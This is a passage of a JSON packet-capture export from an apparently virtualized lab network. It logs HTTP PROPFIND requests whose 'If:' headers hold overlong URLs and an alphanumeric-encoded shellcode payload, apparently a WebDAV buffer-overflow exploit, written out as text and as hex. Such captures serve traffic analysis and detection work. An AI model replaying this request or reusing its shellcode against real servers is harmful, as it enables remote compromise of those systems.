"http.request.line": "If: <http://192.168.68.1:80/iagqxBjmBQgeXAYIOvPXykzvFHTDMLlPcvsxlRRpQuzpHBhcbAqYdgQuBZfkkeEUXqTxZsNxzERQdeLbYVFJOzB<7A><42><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/aBMSPzyiqRLsTzyfkuparxMqTtDDVChRXruajsagoGWMKeMoebkPHjYKAAxWyHPchrrVMdVYSKuwYApGuNkCsEu<45><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "372"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.812670000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.812670000",
|
||
"frame.time_delta": "0.000005000",
|
||
"frame.time_delta_displayed": "0.003874000",
|
||
"frame.time_relative": "17.063610000",
|
||
"frame.number": "379",
|
||
"frame.len": "301",
|
||
"frame.cap_len": "301",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "287",
|
||
"ip.id": "0x0000184e",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00001824",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "46323",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "46323",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "60",
|
||
"tcp.len": "235",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "584778427",
|
||
"tcp.nxtseq": "1684",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3103548799",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00005982",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:4c:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:4c:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868620",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000294000",
|
||
"tcp.analysis.bytes_in_flight": "1683",
|
||
"tcp.analysis.push_bytes_sent": "1683"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000526000",
|
||
"tcp.time_delta": "0.000005000"
|
||
},
|
||
"tcp.payload": "62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "378",
|
||
"tcp.segment": "379",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1683",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:74:6c:62:46:46:4a:58:63:50:76:54:54:77:6a:6d:4c:6d:62:6e:67:46:46:6f:4e:77:78:48:58:47:58:65:6e:77:41:44:64:46:4a:50:48:41:68:69:45:6d:56:77:69:52:52:57:41:46:67:78:55:53:63:63:69:74:79:75:74:4d:49:51:50:77:73:4b:58:69:50:6e:59:7a:41:4a:6a:59:52:59:4f:46:55:e6:a5:a6:e4:99:84:e6:b1:b4:e4:89:ac:e4:8d:ac:e6:a1:81:e6:91:a9:e7:91:85:e4:89:8e:e7:a1:90:e7:89:93:e5:a9:81:e4:99:90:e5:a1:b4:e6:b9:8c:e6:89:87:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:a9:a9:e4:85:94:e4:95:a9:e5:a5:90:e6:a1:8c:e5:91:b3:e6:9d:8e:e5:9d:a3:e6:95:94:e5:a5:b9:e6:99:ae:e5:8d:b2:e7:81:83:e7:99:93:e4:ad:ba:e6:bd:8b:e7:99:92:e5:a5:99:e7:8d:b0:e5:81:a8:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:57:65:55:48:71:54:49:72:77:42:75:4c:64:49:4f:41:4b:47:56:65:55:4d:45:6a:51:50:78:54:4d:41:59:5a:4f:54:66:72:62:51:43:65:43:43:64:55:55:45:52:6c:54:4c:79:6c:63:7a:61:43:63:4f:4d:64:59:6f:58:42:70:78:70:6a:42:52:77:7a:6d:4b:79:66:6a:41:62:69:56:6e:5a:5a:43:68:e4:b9:b3:e5:a5:aa:e6:91:ac:e5:95:ac:e7:8d:b4:e6:b5:83:e4:bd:b7:e6:8d:88:e7:89:8e:e4:bd:95:e4:95:ba:e4:ad:a8:e5:a9:99:e7:8d:a1:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e6:99:97:e6:b5:87:e5:89:a5:e4:bd:8b:e1:8f:80:e6:a0:83:e7:89:aa:e6:ad:a3:e4:9d:a7:e4:89:aa:e5:91:b8:e6:91:89:e4:9d:a7:e6:a5:98:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/tlbFFJXcPvTTwjmLmbngFFoNwxHXGXenwADdFJPHAhiEmVwiRRWAFgxUSccityutMIQPwsKXiPnYzAJjYRYOFU<46><55><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/WeUHqTIrwBuLdIOAKGVeUMEjQPxTMAYZOTfrbQCeCCdUUERlTLylczaCcOMdYoXBpxpjBRwzmKyfjAbiVnZZCh<43><68><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFB